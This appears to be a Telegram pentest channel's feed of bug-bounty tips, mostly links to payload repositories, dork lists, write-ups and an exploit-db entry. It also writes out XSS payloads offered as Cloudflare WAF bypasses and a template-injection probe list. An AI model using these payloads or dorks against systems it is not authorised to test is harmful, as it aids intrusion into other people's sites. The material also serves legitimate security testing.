🗒 Optimizing Blind SQL Injection Detection with Content-Length Differences
https://bountysecurity.ai/blogs/news/optimizing-blind-sql-injection-detection-with-content-length-differences
@PenTest_Tm
🗒 Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
@PenTest_Tm
GIT files Dorks
Universal for Google, Bing etc
https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt
Bug Bounty Dorks
Universal for Google, Bing etc
https://github.com/hackingbharat/bug-bounty-dorks-archive/blob/main/bbdorks
@PenTest_Tm
🗒 XSS Bypass Cloudflare WAF
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
@PenTest_Tm
Log files Dorks
Universal for Google, Bing etc:
https://github.com/Proviesec/google-dorks/blob/main/google-dorks-best-log.txt
@PenTest_Tm
🗒 Login Bypass
https://rajput623929.medium.com/bug-bounty-tutorial-login-bypass-technique-d7508856b2a1
@PenTest_Tm
@cryptosignalsfree12
بچهایی که تو کار کریپتو هستن میتونید استفاده کنید
🗒 Server Side Template Injection Payload List
{7*7}
*{7*7}
{{7*7}}
[[7*7]]
${7*7}
@(7*7)
<?=7*7?>
<%= 7*7 %>
${= 7*7}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
🗒 How we applied advanced fuzzing techniques to cURL
https://blog.trailofbits.com/2024/03/01/toward-more-effective-curl-fuzzing/
@PenTest_Tm
🗒 Bypass Cloudflare protected sites with sqlmap
بچها یه مقاله عالی برای بایپس WAF با sqlmap
pkhadka56/bypass-cloudflare-protected-sites-with-sqlmap-64b1644b0414" rel="nofollow">https://medium.com/@pkhadka56/bypass-cloudflare-protected-sites-with-sqlmap-64b1644b0414
@PenTest_Tm
@cryptosignalsfree12
بچهایی که تو کار کریپتو هستن میتونید استفاده کنید
🗒 Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
🗒 Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
آسیب پذیری RCE از افزونه وردپرسیه Background Image CROPPER ورژن 1.2
https://www.exploit-db.com/exploits/51998
@PenTest_Tm
🗒 Bug Bounty Cheat Sheets
SSRF
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
CRLF
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
@PenTest_Tm
🗒 Bug Bounty Cheat Sheets
XSS:
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLI:
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
@PenTest_Tm
Google dorks
Link1
Link2
Link3
Link4
Link5
Link6
Link7
@PenTest_Tm
🗒 How I Found Multiple XSS Vulnerabilities Using Unknown Techniques
https://infosecwriteups.com/how-i-found-multiple-xss-vulnerabilities-using-unknown-techniques-74f8e705ea0d
@PenTest_Tm
🗒 One-click Account Take Over
https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea
@PenTest_Tm
🗒Open Redirect via Non\-Latin Subdomain in vcc\-\*\.8x8\.com/AGUI/test\.php
https://hackerone.com/reports/2331473
@PenTest_Tm
🗒 Cross-Site Scripting (XSS) Explained!
How to Bug Bounty
https://www.youtube.com/watch?v=ej2O4lOUzRc
@PenTest_Tm
🗒 bypass XSS Cloudflare WAF
Encoded Payload
"><track/onerror='confirm\%601\%60'>
Clean Payload
"><track/onerror='confirm1'>
@PenTest_Tm